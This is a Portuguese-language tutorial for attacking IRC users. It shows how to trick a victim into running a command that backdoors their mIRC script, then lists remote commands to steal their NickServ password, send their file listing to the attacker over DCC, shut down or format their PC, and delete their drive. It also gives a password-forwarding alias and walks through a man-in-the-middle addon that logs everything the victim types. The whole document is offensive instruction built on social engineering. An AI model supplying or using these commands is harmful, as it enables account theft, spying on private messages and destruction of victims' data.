-------------------1

Consiste em convencer a vítima digitar o seguinte comando:



//write ^ ctcp *:^:$2- | /.load -rs ^



Esse comando abre um backdoor no script da pessoa deixando ela vulnerável a comandos remotos

no IRC, como esse comando atinge apenas o script se a pessoa trocar de script, você não consegue

mais ataca-la.



Como atacar a vítima por esse backdoor?



/ctcp nickdavítima ^ comando





Se o nick da vítima for _giNK_ por exemplo, e você quer trocar a senha dele para qualquer coisa que vc quiser eh soh vc digitar a senha nova ae, onde esta escrito SENHA NOVA

basta digitar o seguinte comando:



/ctcp _giNK_ ^ nickserv set password SENHA NOVA



Abaixo segue uma lista de comandos para você utilizar neste ataque:



· Ver os arquivos da vítima listados



/ctcp Cachopa_ /alias list return $findfir(c:,*.*,write C:\Windows\Desktop\dir.txt $1-)

/ctcp Cachopa_ /list

/ctcp Cachopa_ /dcc send nick C:\Windows\Desktop\dir.txt

/ctcp Cachopa_ /dcc send nick -p C:\Windows\Desktop\dir.txt



· Desligar o PC da vítima



/ctcp nick /run C:\WINDOWS\RUNDLL32.EXE shell32,SHExitWindowsEx



ou



/ctcp nick /run c:/windows/rundll.exe user.exe,exitwindows



· Executar arquivos com determinado número de vezes:



/ctcp nick //%x = 1 | while %x < 9 { run c:\windows\notepad.exe $+(c:\n,%x) | inc %x }

/ctcp nick //%x = 1 | while %x > 0 { run c:\windows\notepad.exe $+(c:\n,%x) | inc %x }



· Formatar o PC da vítima:



/ctcp nick /run command format c:



e



/ctcp nick //return $findfile(c:,*.*,0,.remove $1-)



ou



/ctcp nick /run deltree /y C:\



2º SENHA POR MEMOSERV



Esse é um método muito simples, consiste em você convencer a vítima a digitar esse comando:



/ctcp nick ^ /.alias nickserv if ($1 == identify) /.raw -q memoserv send seunick Senha

de $me $+ : $2- | nickserv $1-





*No lugar de “seu nick” você coloca o seu nick por exemplo se seu nick for surfista_loko:





/ctcp nick ^ /.alias nickserv if ($1 == identify) /.raw -q memoserv send

surfista_loko Senha de $me $+ : $2- | nickserv $1-



Após a vítima digitar esse comando, você pode descansar que em algum tempinho

a senha dele estará no seu memoserv.



------------------------------------2

Addons

Addons são mini-programas, com rotinas programadas para fazerem determinada ação em seu script como por exemplo colocar um onotice, um auto-color, mas o que nos interessa mesmo são os addons de guerra como são chamados. Eles podem se dividir em 3 sub-grupos:

• Addons de Guerra Remotos

Eles ficam alojados no PC da vítima, mas só são realmente perigosos se forem carregados no script da vítima, é como um server de um trojan se a pessoa abrir... BUM! Está vulnerável, se não abrir então está livre dos ataques daquele trojan, assim funciona também os addons remotos, se a pessoa carregar o addon com o seguinte comando então ele se aloja no script dela:

/load -rs nomedoarquivo.extensão

Ex. /load -rs sinisters.mrc

Depois da pessoa carregar o addon ela está completamente vulnerável aos ataques que o addon possibilita, a partir daí você faz o que quiser, aqui não tem como eu explicar como se usa addons, cada qual tem seu manual e seu jeito de funcionar, geralmente o manual vem junto com o addon.

• Addons Locais e Remotos

Esses são uma mistura dos dois acima, é como um trojan também, o addon local você usa para atacar(como o client de um trojan), e o remoto, você envia para vítima(como o server).

Esses são os métodos mais comuns utilizados por “réckers” do IRC.

Addon Exemplo(Mirc Server Spy)

Abaixo explicaremos como utilizar um Addon muito conhecido e muito utilizado atualmente no IRC para se roubar nicks, o Mirc Server Spy, ele age como um intermediário entre a vítima e o servidor, ou seja, tudo que a vítima digitar(comandos, pvt’s, etc) passarão por você antes de chegar ao servidor, assim você poderá pegar senhas, e descobrir o que a vítima anda falando em pvts e chats, funciona como um keylogger remoto mas só para o IRC.

Siga os passos para instala-lo em seu script:

1. Baixe o Addon em http://www.h2ksite.rg3.net/ (este site não existe mais, entrei em contato com o "Mendigo" para ver onde o Addon pode ser encontrado; assim que tiver resposta corrijo esta pequena falha)
2. Extraia-o do WinZip ou outro programa de extração e coloque-o na pasta principal do seu script(ex c:/mIRC)
3. Abra seu script e digite: /load -rs mirc_server_spy.mrc



Após instalado o addon estara aguardando para ser chamado, abaixo um explicação de como abri-lo e também de seus botões e comandos.

Para abrir o addon basta digitar /msv



Após digitar o comando uma janela se abre, abaixo uma rápida explicação dela:



1- Server(Padrão: irc.Barretos.com.br): Quando a pessoa se conectar ao seu IP ela entrara pelo server descrito na caixa de texto(deve ser um servidor válido)
2- Ligar: Liga o servidor que muda o Status(ver nº 7) para “Servidor Ligado”
3- Desligar: Desliga o servidor que muda o Status(ver nº 7) para “Servidor Desligado”
4- Limpar: Limpa a tela(ver nº
5- Reiniciar: Reinicia o Servidor, ou seja, desliga e liga-o novamente(a sua vítima caíra dele)
6- Sair/desconectar: Desliga o servidor, e/ou sai do programa
7- Status: Informa o Status do Servidor(Ligado ou Desligado)
8- Tela: fica gravado tudo que a vítima digitou.

Abaixo explicaremos passo-a-passo como usá-lo:

1- Após abrir o programa digitando /msv digite um server valido ou deixe o padrão(irc.Barretos.com.Br)
2- Clique no botão “Ligar” para ligar o Server
3- Peça para a vítima digitar o comando /server “seu ip”(ex: /server 200.199.198.197)
4- Depois disso é só olhar a Tela que aparecerá tudo que a vítima digitou.